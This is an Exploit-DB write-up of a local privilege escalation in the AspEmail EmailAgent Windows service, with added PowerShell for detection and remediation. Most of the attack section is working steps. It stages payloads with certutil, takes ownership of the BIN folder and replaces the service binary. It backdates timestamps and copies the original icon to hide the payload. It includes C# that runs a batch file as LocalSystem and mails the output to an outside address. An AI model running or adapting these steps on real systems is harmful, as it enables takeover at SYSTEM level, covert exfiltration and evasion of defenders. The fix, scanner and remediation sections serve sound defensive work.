[local] AspEmail v5.6.0.2 - Local Privilege Escalation

source link: https://www.exploit-db.com/exploits/51380


# Exploit Title:  AspEmail - Local Privilege Escalation                                                    #
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]                             #
# Date: 13/04/2023                                                                                                 #
# Exploit Author: Zer0FauLT [[email protected]]                                                               #
# Vendor Homepage: https://www.aspemail.com                                                                        #
# Software Link: https://www.aspemail.com/download.html                                                            #
# Product: AspEmail                                                                                                #
# Version: AspEmail v5.6.0.2 (author reports all versions affected)                                               #
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU                                                    #
# Tested on: Windows Server 2016 and Windows Server 2019                                                           #
# CVE : none assigned (published as 0day)                                                                          #

# ==================================================================================================================

[+] C:\PenTest>whoami /priv


 Privilege Name                Description                               State   
 ============================= ========================================= ========
 SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
 SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
 SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
 SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
# ==================================================================================================================

* First we check whether the AspEmail service is actually running. As a normal user we list the processes that are
* bound to services and look for the service's image:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
   EmailAgent.exe                4400 Persits Software EmailAgent


[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
   EmailAgent64.exe                4400 Persits Software EmailAgent
* Both listings show a process for the "Persits Software EmailAgent" service, so the service is in state "RUNNING".

# ==================================================================================================================

* We will need these files staged on the target. The commands below show only the destination paths; the source URL
* (the first argument to certutil -urlcache -split -f) has been left out of the listing:

[+] C:\PenTest>certutil -urlcache -split -f "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

 Name: Persits Software EmailAgent
 ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
 Agent.exe" /run
 User              : LocalSystem
 ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
 IdentityReference : Everyone
 Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, 
 AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, 
 ReadExtendedAttributes, DeleteChild, Execute/Traverse
 Status            : Unknown
 UserCanStart      : False
 UserCanStop       : False
[+] C:\PenTest>del PrivescCheck.ps1

* Our checks flag a "Binary Permission Vulnerability" on the "Persits Software EmailAgent" service: the directory holding
* the service binary is modifiable by Everyone, while the service itself runs as LocalSystem.
* Note UserCanStart / UserCanStop = False: a normal user cannot restart the service, so a replaced binary only runs at the
* next reboot or when an administrator restarts the service.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"

    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* The parent directory is not readable by us at all, so we cannot even list its ACL.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

 C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                            NT SERVICE\TrustedInstaller:(I)(CI)(F)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
* Unlike the parent, the "BIN" directory grants Everyone full control: (OI)(CI) means the ACE is inherited by every
* file and subdirectory created below it, and (F) is Full Control, which includes write, delete, WRITE_DAC and WRITE_OWNER.
* In Linux terms this is roughly chmod 0777 (rwxrwxrwx) on the directory.
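The PrivescCheck run and the icacls listing above test one service that we already suspected. The following PowerShell, an added example that is not part of the Exploit-DB entry, performs the same check for every installed service: it resolves each service's image path (quoted, unquoted with spaces, or containing environment variables), then reports any Allow ACE on the image file or its directory that grants write, delete, WRITE_DAC or WRITE_OWNER rights to Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE, or the account running the script. The function and variable names are mine; it needs Windows PowerShell 5.1 or later and no elevation.

```powershell
# Added example (not from the Exploit-DB entry): find services whose image file,
# or the directory it lives in, can be written by principals every local user
# belongs to. Windows PowerShell 5.1+; no elevation required. Directories the
# caller cannot read are skipped rather than reported.

# Rights that let a caller replace, alter or re-ACL the target. The two bare
# masks are GENERIC_ALL and GENERIC_WRITE, which some ACEs carry as numbers.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership) -bor 0x10000000 -bor 0x40000000

# Principals any local user is a member of, plus the account running this script.
$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-4',       # INTERACTIVE
    [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
)

function Resolve-ServiceImage {
    # Pull the executable out of a Win32_Service PathName. Handles the quoted
    # form ("C:\Program Files\x\a.exe" /run), the unquoted-with-spaces form
    # (tried prefix by prefix, the way the loader does) and %VAR% expansion.
    param([string]$PathName)
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    $parts = $p -split '\s+'
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]
}

function Get-WeakAces {
    # Allow ACEs on $Path that grant any bit of $WriteMask to a low-priv SID.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($LowPrivSids -notcontains $sid) { continue }
        if ((([int]$ace.FileSystemRights) -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Find-WritableServiceImages {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Resolve-ServiceImage $svc.PathName
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        # Check the file and its directory: the writeup only needed the latter,
        # since rename-and-replace never touches the original file's own ACL.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            foreach ($w in Get-WeakAces $target) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Target    = $w.Path
                    Identity  = $w.Identity
                    Rights    = $w.Rights
                    Inherited = $w.Inherited
                }
            }
        }
    }
}

Find-WritableServiceImages | Sort-Object Service, Target | Format-Table -AutoSize
```

On the host in this writeup the output contains a row for "Persits Software EmailAgent" with Target = the BIN directory, Identity = Everyone and Rights = FullControl. Any row whose RunsAs is LocalSystem, NT AUTHORITY\LocalService or NT AUTHORITY\NetworkService is the same class of bug as the one exploited here.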
# ==================================================================================================================
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID


 \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                   

                                                                                      root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-32-544"  Win32_SID    Win32_SID  2  Administrators  {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}  BUILTIN  S-1-5-32-544  16
 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* The owner of "EmailAgent.exe" is BUILTIN\Administrators, i.e. the binary was laid down by an elevated installer.

# ==================================================================================================================

* Next we take ownership of the directory, since all our operations happen under "BIN". Strictly this is not needed:
* Everyone:(F) already lets us rename and create files there. It does change the directory's owner to our account,
* which is a durable artefact that the ACL fix later in this writeup does not undo.

[+] C:\PenTest>whoami

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
  SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F

  processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
  Successfully processed 1 files; Failed processing 0 files
* All commands succeeded; we now own "BIN" and hold an explicit Full Control ACE on it.
# ==================================================================================================================

* Now we swap the service binary for our own payload.
* We avoid destroying any original file so that every step can be undone: the real EmailAgent.exe is only renamed.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+]  C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  13.04.2023  22:00            12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
# ==================================================================================================================

* Now we set the creation, last-modified and last-accessed timestamps of the payload so that it blends in with its neighbours.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next we extract the icon from the real EmailAgent.exe and apply it to the payload, so that it is harder to spot by eye.
* I used the Resource Tuner Console tool:
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* The same can be done with the Resource Tuner GUI:
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
   Volume in drive C has no label.
   Volume Serial Number is 0C8A-5291

   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

  14.04.2023  16:47    <DIR>          .
  14.04.2023  16:47    <DIR>          ..
  01.03.2004  15:55           143.360 AspEmail.dll
  25.02.2004  16:23           188.416 AspUpload.dll
  24.09.2003  09:21            12.288 EmailAgent.exe
  24.09.2003  09:22           139.264 EmailAgentCfg.cpl
  24.09.2003  09:25            94.208 EmailLogger.dll
  24.09.2003  09:21           167.936 Null.EmailAgent.exe
                 6 File(s)        745.472 bytes
                 2 Dir(s)  165.936.717.824 bytes free
  [24.09.2003  09:21]            12.288 EmailAgent.exe
  [24.09.2003  09:21]           167.936 Null.EmailAgent.exe
* Timestamp manipulation is done: payload and original now appear to have been written at the same moment, long ago.

# ==================================================================================================================

* Now we check who owns the payload.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID


  \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"                                                                                                                                                                                                                                                                                                                

  \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"                                                     root\cimv2  DeepSecLab  {}  5  Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"  Win32_SID    Win32_SID  2  Hacker  {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}  DeepSecLab  S-1-5-21-3674093405-176013069-2091862131-1511  28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name



   EmailAgent.exe Owner: DeepSecLab\Hacker
* Backdated timestamps do not change this: the payload is owned by our account, not by BUILTIN\Administrators like the
* original. A defender comparing owners across the BIN directory will see it immediately.

# ==================================================================================================================
#                                               #[EmailAgent.cs]#
# ==================================================================================================================
* We build the replacement EmailAgent.exe so that when the server is rebooted (i.e. when the services are restarted)
* the SCM launches it as LocalSystem, it runs the commands we want,
* and then mails the output to the address we specify.
* It is not a real service (it never calls StartServiceCtrlDispatcher), so the SCM will log a start timeout
* (error 1053) for "Persits Software EmailAgent"; the payload has already run by then, but the event is visible.

 using System;
 using System.Diagnostics;
 using System.IO;

 namespace CliToolSpace
 {
     // Stand-in for the "Cli" helper the listing relies on but does not show: runs a command
     // line through cmd.exe, captures its stdout and can write that to a directory.
     class Cli
     {
         string _command = "", _output = "";
         public void FileToCli(string command) { _command = command; }
         public void Execute()
         {
             var psi = new ProcessStartInfo("cmd.exe", "/c " + _command) { UseShellExecute = false, RedirectStandardOutput = true, CreateNoWindow = true };
             using (var p = Process.Start(psi)) { _output = p.StandardOutput.ReadToEnd(); p.WaitForExit(); }
         }
         public void ToFile(string directory) { File.WriteAllText(Path.Combine(directory, "CliOutput.txt"), _output); }
     }

     class _Main
     {
         static void Main(string[] args)
         {
             Cli commandLine = new Cli();
             // Run.bat must run first: it writes Export.txt, which Mail.exe attaches.
             commandLine.FileToCli(@"C:\Windows\Temp\Run.bat & C:\Windows\Temp\Mail.exe");
             commandLine.Execute();
             commandLine.ToFile(@"C:\Windows\Temp\");
             // Remove the staged helpers once the mail has gone out.
             File.Delete(@"C:\Windows\Temp\Mail.exe");
             File.Delete(@"C:\Windows\Temp\Run.bat");
         }
     }
 }

# ==================================================================================================================
#                                                 #[Mail.cs]#
# ==================================================================================================================

 using System;
 using System.Net;
 using System.Net.Mail;

 class Mail
 {
     static void Main()
     {
         // Host, addresses and password are the lab values from the listing (the addresses are
         // redacted in the published copy). Anything hard-coded here ships to the target in cleartext.
         SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
         var mail = new MailMessage();
         mail.From = new MailAddress("[email protected]");
         mail.To.Add("[email protected]");
         mail.Subject = "Trigger Successful!";
         mail.IsBodyHtml = true;
         mail.Body = "<strong>This server has been rebooted.</strong>";
         // Export.txt is produced by Run.bat just before this program runs.
         mail.Attachments.Add(new Attachment(@"C:\Windows\Temp\Export.txt"));
         SmtpServer.Port = 587;
         SmtpServer.UseDefaultCredentials = false;
         SmtpServer.Credentials = new NetworkCredential("[email protected]", "p@ssw0rd123");
         SmtpServer.EnableSsl = true;
         SmtpServer.Timeout = int.MaxValue;
         SmtpServer.Send(mail);
     }
 }

# ==================================================================================================================
#                                                 #[Run.bat]#
# ==================================================================================================================

  @echo off
  whoami > C:\Windows\Temp\Export.txt
  cd /d "C:\Program Files (x86)\Persits Software\AspEmail\Bin"
  rem The image of a running process cannot be deleted, but it can be renamed:
  rem move the payload aside and give the original its name back, so the next
  rem service start runs the real EmailAgent.exe. EmailAgent.exe.old has to be
  rem removed by hand once this process has exited.
  ren EmailAgent.exe EmailAgent.exe.old
  ren Null.EmailAgent.exe EmailAgent.exe

# ==================================================================================================================
#                                              [+]Trigger Successful![+]
# ==================================================================================================================
[+] C:\PenTest>systeminfo | findstr "Boot Time"
  System Boot Time:          13.04.2022, 07:46:06

#                                                   #[Export.txt]#
                                                 NT AUTHORITY\SYSTEM

# ==================================================================================================================
#                                                   ...|||[FIX]|||...                                              #
# ==================================================================================================================
#                                [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]                     #
# =================================================================================================================#

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
  [SC] QueryServiceConfig SUCCESS

  SERVICE_Name: Persits Software EmailAgent
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_Name   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_Name       : Persits Software EmailAgent
          DEPENDENCIES       : rpcss
          SERVICE_START_Name : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"


# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

  Accesschk v6.15 - Reports effective permissions for securable objects
  Copyright (C) 2006-2022 Mark Russinovich
  Sysinternals - www.sysinternals.com

  Persits Software EmailAgent
    Medium Mandatory Level (Default) [No-Write-Up]
    RW BUILTIN\Administrators
# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"

  Successfully processed 0 files; Failed processing 1 files
  C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

* /RESET replaces every explicit ACE under "Persits Software" with the ACEs inherited from Program Files (x86), which
* removes Everyone:(F) on BIN; the second command, run as the normal user again, confirms the directory is closed.
* Two things /RESET does not do. It does not change ownership: after the takeown above the low-privileged user still
* owns BIN, and the owner of an object can always rewrite its DACL, so also run
* ICACLS "C:\Program Files (x86)\Persits Software" /setowner "BUILTIN\Administrators" /T /C /Q. And it does not remove a
* binary that was already planted, so verify EmailAgent.exe (owner, hash) against the original before trusting the service.


# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"

[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* Stopping and starting the service is optional for the ACL fix itself, but a restart is what makes the SCM load whatever
* EmailAgent.exe is on disk, so do it only after confirming the original binary is back in place.
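The FIX above resets the ACLs and then trusts that it worked. The following PowerShell, an added example that is not part of the Exploit-DB entry, does the remediation end to end: it records owner, timestamps, signature and hash of everything under BIN before touching it, returns ownership to Administrators (the owner of an object can always rewrite its DACL, so leaving the attacker as owner of BIN after the takeown step would let them re-grant themselves Full Control), resets the tree to inherited permissions with the same icacls command as above, verifies that no explicit ACE survived, and restarts the service only if no untrusted owner was found. The service name and paths are the writeup's; the trusted-owner SID list and the function names are my assumptions.

```powershell
# Added example (not from the Exploit-DB entry): apply the FIX and verify it.
# Run from an elevated PowerShell. Service name and paths are the writeup's;
# the trusted-owner list is an assumption (Administrators, SYSTEM and
# TrustedInstaller are what a normal Program Files install leaves as owners).

$ServiceName   = 'Persits Software EmailAgent'
$InstallRoot   = 'C:\Program Files (x86)\Persits Software'
$BinDir        = Join-Path $InstallRoot 'AspEmail\BIN'
$TrustedOwners = @(
    'S-1-5-32-544',                                                    # BUILTIN\Administrators
    'S-1-5-18',                                                        # NT AUTHORITY\SYSTEM
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'   # NT SERVICE\TrustedInstaller
)

function Get-TreeItems {
    param([string]$Root)
    @(Get-Item -LiteralPath $Root) + @(Get-ChildItem -LiteralPath $Root -Recurse -Force)
}

function Get-ExplicitAces {
    # After `icacls /reset` every ACE under $Root is inherited from
    # %ProgramFiles(x86)%. Anything explicit means the reset failed or something
    # (an installer repair, for instance) has re-applied a loose ACE.
    param([string]$Root)
    foreach ($item in Get-TreeItems $Root) {
        foreach ($ace in (Get-Acl -LiteralPath $item.FullName).Access) {
            if ($ace.IsInherited) { continue }
            [pscustomobject]@{ Path = $item.FullName; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Get-OwnerTriage {
    # Owner, timestamps, signature and hash of everything under $Root. Timestamps
    # can be backdated (the writeup does it with nircmd), but a file or directory
    # created or taken over by a low-privileged account is owned by that account,
    # which is exactly what the WMIC owner query in the writeup exposed.
    param([string]$Root)
    foreach ($item in Get-TreeItems $Root) {
        $owner = (Get-Acl -LiteralPath $item.FullName).Owner
        try   { $ownerSid = ([System.Security.Principal.NTAccount]$owner).Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { $ownerSid = $owner }   # already a raw SID (deleted account) or untranslatable
        $sig = $null; $hash = $null
        if (-not $item.PSIsContainer) {
            $sig  = (Get-AuthenticodeSignature -LiteralPath $item.FullName).Status
            $hash = (Get-FileHash -LiteralPath $item.FullName -Algorithm SHA256).Hash
        }
        [pscustomobject]@{
            Path         = $item.FullName
            Owner        = $owner
            OwnerTrusted = $TrustedOwners -contains $ownerSid
            Created      = $item.CreationTime
            Modified     = $item.LastWriteTime
            Signature    = $sig
            Sha256       = $hash
        }
    }
}

# 1. Record the evidence before changing anything.
$triage = @(Get-OwnerTriage -Root $BinDir)
$triage | Format-Table Path, Owner, OwnerTrusted, Created, Modified, Signature -AutoSize

# 2. Hand the tree back to Administrators. The owner of an object can always
#    rewrite its DACL (implicit WRITE_DAC), so a reset that leaves the attacker
#    as owner of BIN is one icacls /grant away from being undone.
& icacls $InstallRoot /setowner 'BUILTIN\Administrators' /T /C /Q | Out-Null

# 3. Replace every explicit ACE with the inherited defaults (the FIX command).
& icacls $InstallRoot /T /C /Q /RESET | Out-Null

# 4. Prove the loose ACE is gone.
$explicit = @(Get-ExplicitAces -Root $InstallRoot)
if ($explicit.Count) { Write-Warning 'Explicit ACEs remain:'; $explicit | Format-Table -AutoSize }
else { 'ACL reset verified: every ACE under the install root is inherited.' }

# 5. The SCM runs whatever EmailAgent.exe is on disk, so restart only if nothing
#    under BIN was owned by an untrusted account; otherwise restore from install
#    media first and compare the Sha256 column against a known-good copy.
if ($triage | Where-Object { -not $_.OwnerTrusted }) {
    Write-Warning "Untrusted owner under $BinDir; not restarting $ServiceName."
} else {
    Restart-Service -Name $ServiceName
}
```

Keep in mind that /RESET also strips explicit ACEs a vendor set on purpose; for a service running as LocalSystem, as here, nothing is lost, but for a service running as a dedicated low-privileged account that writes logs under its own install tree, re-grant that account write access to the log directory only, never to the directory holding the binary.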

# ==================================================================================================================
